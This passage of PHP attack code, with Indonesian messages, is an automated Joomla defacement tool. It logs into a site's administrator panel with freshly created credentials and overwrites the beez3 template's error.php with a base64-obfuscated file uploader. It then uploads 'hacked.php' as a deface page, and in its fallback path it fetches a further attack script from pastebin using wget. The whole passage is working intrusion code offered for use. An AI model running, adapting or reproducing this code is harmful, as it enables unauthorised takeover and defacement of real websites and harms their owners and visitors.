"$user_baru",
"passwd" => "$password_baru",
"lang" => "en-GB",
"option" => "com_login",
"task" => "login",
"return" => "aW5kZXgucGhw",
"$token1" => "1",
);
$ch = curl_init ("$site");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
$masuk = curl_exec ($ch);
$token2 = token($site);
$upload = base64_decode("Z3cgZ2FudGVuZw0KPD9waHANCiAgJGZpbGUgPSAkX0ZJTEVTWydmaWxlJ107DQogICRuZXdmaWxlPSJrLnBocCI7DQoJCWlmIChmaWxlX2V4aXN0cygiLi4vLi4vIi4kbmV3ZmlsZSkpIHVubGluaygiLi4uLi8vIi4kbmV3ZmlsZSk7DQogICAgCW1vdmVfdXBsb2FkZWRfZmlsZSgkZmlsZVsndG1wX25hbWUnXSwgIi4uLy4uLyRuZXdmaWxlIik7DQo/Pg0K");
$post2 = array(
"jform[source]" => "$upload",
"task" => "template.save",
"$token2" => "1",
"jform[extension_id]"=> "503",
"jform[filename]" => "/error.php",
);
$ch3 = curl_init ("$site");
curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch3, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch3, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch3, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch3, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch3, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch3, CURLOPT_POST, 1);
curl_setopt ($ch3, CURLOPT_POSTFIELDS, $post2);
curl_setopt($ch3, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch3, CURLOPT_COOKIEFILE,'coker_log');
$masuk2 = curl_exec ($ch3);
if(preg_match("#successfully#is", $masuk2)){
echo "uploader udh ketanem...
";
echo "lanjut mepes...
";
$file_pepes = "hacked.php";
$ch4 =curl_init("$target/templates/beez3/error.php");
curl_setopt($ch4, CURLOPT_POST, true);
curl_setopt($ch4, CURLOPT_POSTFIELDS,
array('file'=>"@$file_pepes"));
curl_setopt($ch4, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch4, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch4, CURLOPT_SSL_VERIFYHOST, 0);
$postResult = curl_exec($ch4);
curl_close($ch4);
$ch5 = "$target/k.php";
$file2 = @file_get_contents($ch5);
if(preg_match('#hacked#is', $file2)){
echo "berhasil mepes...
";
echo "$target/k.php
";
}
else{
echo "gagal mepes...
";
echo "coba aja manual:
";
echo "$target/administrator
";
echo "username: $user_baru
";
echo "password: $password_baru
";
}
}
else{
echo "failed
";
echo "data udh bener. beda template mungkin :(
";
echo "coba aja manual:
";
echo "$target/administrator
";
echo "username: $user_baru
";
echo "password: $password_baru
";
echo "atau coba yg path 2
";
system('wget http://pastebin.com/raw.php?i=1Bfg7mF6');
system('cp raw.php?i=1Bfg7mF6 joomla-edit2.php');
echo "Disini..
";
}
curl_close($ch3);
curl_close($ch);
}
elseif($tanya == "n"){
echo "Sukses
";
echo "username: $user_baru
";
echo "password: $password_baru
";
}
}
else{
echo '
Auto Deface y n |